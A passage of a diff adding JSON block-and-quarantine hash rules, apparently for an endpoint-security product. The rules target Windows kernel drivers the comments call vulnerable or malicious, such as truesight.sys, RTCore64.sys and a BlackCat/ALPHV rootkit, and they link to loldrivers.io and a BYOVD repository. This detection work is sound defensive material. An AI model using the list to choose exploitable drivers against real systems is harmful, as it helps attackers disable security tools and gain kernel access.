+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152059Z",
+ "creation_date": "2026-03-23T11:45:31.152062Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152070Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "20e726f48bd86327c0e438667072983195c8140c50fe325598e343b5c8337e48",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85d2ed07-85a8-591f-8beb-1b63a279f39b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977587Z",
+ "creation_date": "2026-03-23T11:45:29.977589Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977594Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b5606dc2a76350916cd77348cfdfe502256d759a4743dd4af503d2f7f348eb70",
+ "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85d8a669-85ce-5232-a004-db477c3b7d51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144107Z",
+ "creation_date": "2026-03-23T11:45:31.144109Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144114Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29e4972cbcdcff16e1dfa7bf57b046ecba8db445e987e436c303755faff61c89",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85e21733-1f36-5c31-8c10-e43e51b18d92",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978721Z",
+ "creation_date": "2026-03-23T11:45:29.978723Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978729Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f246b9d22b3ffe15f2e97f306d049020f38ed162150c97d7a72e3ae0b22c79ad",
+ "comment": "Vulnerable Kernel Driver (aka PanIO.sys) [https://www.loldrivers.io/drivers/5f70bde4-9f81-44a8-9d3e-c6c7cf65bfae/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85e3ab86-5a3d-50a2-a3e3-2d62d59446a2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156569Z",
+ "creation_date": "2026-03-23T11:45:31.156571Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156576Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2f3eaa8c165f2aabf97f24b14946b9a196317ee3082a26b82232bbab4bdba12",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85e5a15d-d525-58ac-985f-f68251796e67",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480469Z",
+ "creation_date": "2026-03-23T11:45:30.480472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480477Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "edbb23e74562e98b849e5d0eefde3af056ec6e272802a04b61bebd12395754e5",
+ "comment": "Vulnerable Kernel Driver (aka GtcKmdfBs.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85ea8871-35a0-505f-9f4a-e0ca3acbf671",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142611Z",
+ "creation_date": "2026-03-23T11:45:32.142614Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142620Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1cd219f58b249a2e4f86553bdd649c73785093e22c87170798dae90f193240af",
+ "comment": "KingSoft Antivirus Security System Driver (aka ksapi64.sys and ksapi64_del.sys) [https://github.com/BlackSnufkin/BYOVD/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85ee9ba9-6420-5989-8246-afb39bca62f5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146435Z",
+ "creation_date": "2026-03-23T11:45:32.146437Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146442Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a74c2bde0c9a76486657ccb9c79ea87c9891a32cdd4aa15c7542f7c9487a539",
+ "comment": "Malicious Kernel Driver (aka driver_1a74c2bd.sys) [https://www.loldrivers.io/drivers/af153e7c-13fa-4a40-a095-00726ad6d783/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85f4e67a-c2f9-5cb1-a105-c66d5690fc4f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815897Z",
+ "creation_date": "2026-03-23T11:45:30.815899Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815905Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65cf1a886b3e3ec8070bde31cb8e254cd623de1e8c7dd71248b84e6de77a08e6",
+ "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "86017052-d7f2-5138-b7b0-b4ca8d2ead61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607724Z",
+ "creation_date": "2026-03-23T11:45:29.607725Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607738Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "862d0ff27bb086145a33b9261142838651b0d2e1403be321145e197600eb5015",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "860e59bf-7bdf-5580-93bd-221822578e34",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454536Z",
+ "creation_date": "2026-03-23T11:45:30.454539Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454548Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "84cec13cf0e77ec889e6e01a265a8a5507c6e7d8b0ad6e971f346d2514a758fe",
+ "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "86138443-ba7c-5a09-8c22-7e5c255d6c97",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834186Z",
+ "creation_date": "2026-03-23T11:45:30.834189Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834198Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d32a94e7f1d7ef2c5449dfbcd01274f8943fb506f41b29fad00d4db71e8dcd0a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "861eb644-e365-58aa-8c2c-1b969b2448a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140381Z",
+ "creation_date": "2026-03-23T11:45:31.140383Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140389Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9947a8428d025a046e5d9d8802d9a1884ddb324c52653abeffc1f501195b6931",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "86266002-a6d6-5ddd-86d1-fb04af9c9c98",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153596Z",
+ "creation_date": "2026-03-23T11:45:31.153598Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153603Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f198254936c2675e7137733f1f927da705f7535e401fa6d87be14bd6d57fa46f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "862a2e41-bc36-59ea-8c4e-a7c9eafafde6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967177Z",
+ "creation_date": "2026-03-23T11:45:29.967181Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967190Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2b03a8bad9ecfcacc8e8a21ee310ce359e1382d7a5d5ce5284b32ecc2bcc4b8a",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "862b710a-71ec-5732-8ce5-f786dfb875d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812635Z",
+ "creation_date": "2026-03-23T11:45:31.812638Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812652Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a683ab7ebe5f4ac157908267f80123d548e1b273cea57e2485ec8ddc81820085",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "86309dca-5932-52b4-9555-a809c55a3615",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479603Z",
+ "creation_date": "2026-03-23T11:45:31.479607Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479617Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c9564153321652f89ce43a81efe351be6eb3a8f84e7b02f8c2162f2f297b6b18",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "863af704-e2b0-5ba6-a603-f42f06d519e6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481442Z",
+ "creation_date": "2026-03-23T11:45:30.481445Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481454Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d6cb3418c1a512aef6b15586bf5234689d4e471e854103a72d80a8597d263403",
+ "comment": "Vulnerable Kernel Driver (aka phymem_ext64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8663209f-cc28-5174-8de6-339b60246770",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835859Z",
+ "creation_date": "2026-03-23T11:45:30.835861Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835867Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14d0649d4833f904071a57baea3184dcb289e28661fb95cd532fa2f7440e3cc1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8663bc9f-bf28-524b-a8ba-00115f5114ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985485Z",
+ "creation_date": "2026-03-23T11:45:29.985487Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985492Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "56066ed07bad3b5c1474e8fae5ee2543d17d7977369b34450bd0775517e3b25c",
+ "comment": "Malicious BlackCat/ALPHV Ransomware Rootkit (aka dkrTK.sys) [https://www.virustotal.com/gui/file/56066ed07bad3b5c1474e8fae5ee2543d17d7977369b34450bd0775517e3b25c/details] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8668aa98-3053-5d57-837c-e6a931bf0ee8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494986Z",
+ "creation_date": "2026-03-23T11:45:31.494988Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494994Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "87bcb6d213e862ffe9afd24a6417b02ccfd6a66808b130c803a7e1fa69eae2f7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "866f0ebd-2c0e-5a35-af58-8d3f6bbc3bc0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820618Z",
+ "creation_date": "2026-03-23T11:45:31.820621Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820629Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c4195b9e85d718e9ca5b53230be30020e457e4424327ebdd51aa48661c91350",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "86814cc3-188e-5d33-bdb7-e9150a679935",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
